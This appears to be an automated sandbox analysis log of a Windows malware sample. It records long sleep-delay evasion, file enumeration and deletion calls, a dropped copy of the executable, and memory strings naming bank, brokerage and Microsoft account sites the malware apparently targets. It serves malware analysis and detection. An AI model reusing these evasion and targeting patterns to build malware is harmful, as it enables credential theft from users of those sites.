                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -598781s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -598672s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -598563s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -598453s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -598344s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -598234s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -598125s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -598016s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -597906s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -597797s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -597687s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -597578s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -597441s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -597281s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -597140s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -597031s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -596922s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -596813s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -596703s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -596594s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -596484s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -596375s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -596266s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -596156s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -596047s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -595938s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -595813s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -595688s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -595563s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -595453s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -595339s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -595234s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -595125s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -595016s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -594891s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -594781s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -594571s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -594469s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -594360s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -594235s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -594110s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -593985s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep count: 34 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -599875s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7060Thread sleep count: 6472 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -599766s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7060Thread sleep count: 3364 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -599652s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -599547s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -599437s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -599328s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -599217s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -599109s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -599000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -598859s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -598737s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -598536s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -598406s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -598296s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -598186s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -598073s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -597969s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -597844s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -597734s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -597623s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -597515s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -597406s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -597297s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -597187s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -597077s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -596969s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -596859s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -596750s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -596641s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -596516s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -596391s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -596281s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -596172s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -596062s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -595953s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -595844s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -595734s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -595625s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -595516s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -595391s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -595266s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -595156s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -595047s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -594937s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -594828s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -594718s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -594609s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -594500s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -594390s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -594281s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -594172s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -594062s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E26CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00E26CA9
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E260DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00E260DD
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E263F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00E263F9
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E2EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E2EB60
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E2F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00E2F5FA
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E2F56F FindFirstFileW,FindClose,0_2_00E2F56F
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E31B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E31B2F
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E31C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E31C8A
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E31F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E31F94
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D66CA9 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00D66CA9
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D660DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_00D660DD
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D663F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_00D663F9
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D6EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00D6EB60
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D6F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_00D6F5FA
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D6F56F FindFirstFileW,FindClose,2_2_00D6F56F
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D71B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00D71B2F
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D71C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00D71C8A
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D71F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00D71F94
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00DFDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00DFDDC0
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599808Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599688Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599578Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599469Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599359Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599250Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599126Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599000Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598890Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598781Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598672Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598563Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598453Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598344Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598234Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598125Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598016Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597906Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597797Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597687Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597578Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597441Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597281Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597140Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597031Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596922Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596813Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596703Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596594Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596484Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596375Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596266Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596156Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596047Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595938Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595813Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595688Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595563Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595453Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595339Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595234Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595125Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595016Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594891Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594781Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594571Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594469Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 593985Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599652Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599328Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599217Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599000Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598859Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598737Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598536Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598406Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598296Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598186Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598073Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597969Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597844Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597734Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597623Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597515Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597406Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597297Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597187Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597077Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596969Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596859Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596750Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596641Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596516Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596391Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596281Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596172Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596062Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595953Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595844Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595734Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595625Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595516Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595391Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595266Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595156Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595047Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594937Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594828Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594718Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594609Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594500Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594390Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594281Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594172Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594062Jump to behavior
                  Source: svchost.exe, 00000006.00000002.4527614360.0000000006555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: svchost.exe, 00000006.00000002.4527614360.0000000006555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: svchost.exe, 00000006.00000002.4527614360.0000000006555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: svchost.exe, 00000006.00000002.4527614360.00000000064FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: svchost.exe, 00000006.00000002.4527614360.00000000064FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: svchost.exe, 00000006.00000002.4527614360.00000000064FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                  Source: svchost.exe, 00000006.00000002.4527614360.00000000064FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: svchost.exe, 00000006.00000002.4527614360.0000000006555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                  Source: svchost.exe, 00000006.00000002.4527614360.0000000006555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: svchost.exe, 00000006.00000002.4527614360.00000000064FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: svchost.exe, 00000006.00000002.4527614360.0000000006555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: svchost.exe, 00000006.00000002.4527614360.0000000006555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: svchost.exe, 00000006.00000002.4527614360.00000000064FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: svchost.exe, 00000006.00000002.4527614360.00000000064FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: svchost.exe, 00000006.00000002.4527614360.00000000064FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: svchost.exe, 00000006.00000002.4527614360.00000000064FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: svchost.exe, 00000006.00000002.4527614360.0000000006555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: svchost.exe, 00000006.00000002.4527614360.00000000064FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: svchost.exe, 00000006.00000002.4527614360.00000000064FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: svchost.exe, 00000006.00000002.4527614360.0000000006555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: svchost.exe, 00000006.00000002.4527614360.0000000006555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: svchost.exe, 00000006.00000002.4527614360.00000000064FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: svchost.exe, 00000006.00000002.4523361245.0000000003054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllB
                  Source: svchost.exe, 00000006.00000002.4527614360.0000000006555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
